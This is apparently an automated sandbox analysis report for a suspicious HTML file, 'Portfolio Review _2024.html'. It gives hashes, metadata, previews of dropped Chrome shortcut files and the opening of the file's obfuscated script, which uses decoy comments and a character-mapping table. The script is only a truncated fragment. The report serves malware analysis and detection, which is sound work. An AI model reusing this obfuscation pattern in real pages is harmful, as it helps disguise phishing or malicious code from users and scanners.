                                                          SHA1:F2717255D73B79174B43C69937130B40D2A16C99
                                                          SHA-256:896F9B5F8111736EEE66C0D22B42A36E3586D9CA2EA6F0F226FE7EDD79142265
                                                          SHA-512:7836573286254492A44B683A5051E47C7DDCB0EEBEBB7A78610637D729D7E2EAFE13AD6DC2C46264F09DD6C81214B202CA251F4FB58C86E136BA9E422C948877
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,....i....9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY$.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY,.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY,.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY,............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T,.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 17:49:26 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2679
                                                          Entropy (8bit):3.9913161377452093
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5EDE0CFF747E6AD0C8577DAC2F11A213
                                                          SHA1:01D2B42ED4F71A14A696E1C170961A248A988822
                                                          SHA-256:9291771BF5DF8D5A99CFC32C85B26A8196737A0030A0A57F44E6E6ABF7835756
                                                          SHA-512:9D118B344C4F2BEBA77DB740602322C1FAC69944BF95996BF56A08D6656477D921854CD9539FBA95F004D246DD054806A0BF6246AE11928BC7E91D9E5B7F68CC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.....u...9..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IrY$.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY,.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VrY,.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VrY,............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VrY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T,.k.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          File type:HTML document, Unicode text, UTF-8 text, with very long lines (368)
                                                          Entropy (8bit):5.522445296822553
                                                          TrID:
                                                          • HyperText Markup Language (12001/1) 29.26%
                                                          • HyperText Markup Language (12001/1) 29.26%
                                                          • HyperText Markup Language (11001/1) 26.83%
                                                          • HyperText Markup Language (6006/1) 14.65%
                                                          File name:Portfolio Review _2024.html
                                                          File size:2'604 bytes
                                                          MD5:345e77908be5f5743e6edcafafb0cca1
                                                          SHA1:753e38cdc04cab3022e3a49bf42358d832098cf5
                                                          SHA256:c056493c081c10f337b154426ecd66c78e6a29a27e36cd07a925a9cb53d2c236
                                                          SHA512:1691138dd030510c08c64a91e00c063c68fadf4c2b34771f77c698a6ec9e6e9434c76281561ac1c1f008fc07bf9a877323f0c67dfb79f649b176dce649b05300
                                                          SSDEEP:48:EqOfBEJvI/H+xqYw1EYLPOEreDFt+9VLcNF8CD0oeUmByGQQsRUYvIlatVCxHdz:OWZyYgEcOEEw9JcNde2GQQOtVCxh
                                                          TLSH:A95143222F6383F31A23CDA6212FD118759E073B126AD1D8E088E3595A03B77890FDC8
                                                          File Content Preview:<html>.<head><meta charset="UTF-8"> <p> He planted a tree in the backyard. </p> --></head><body>.<script>.shearwater /* The writer found inspiration in the bustling city. */ = {"....":"v","....":"d","...........":"e","....":"p",".......":"3","....":
                                                          Icon Hash:173149cccc490307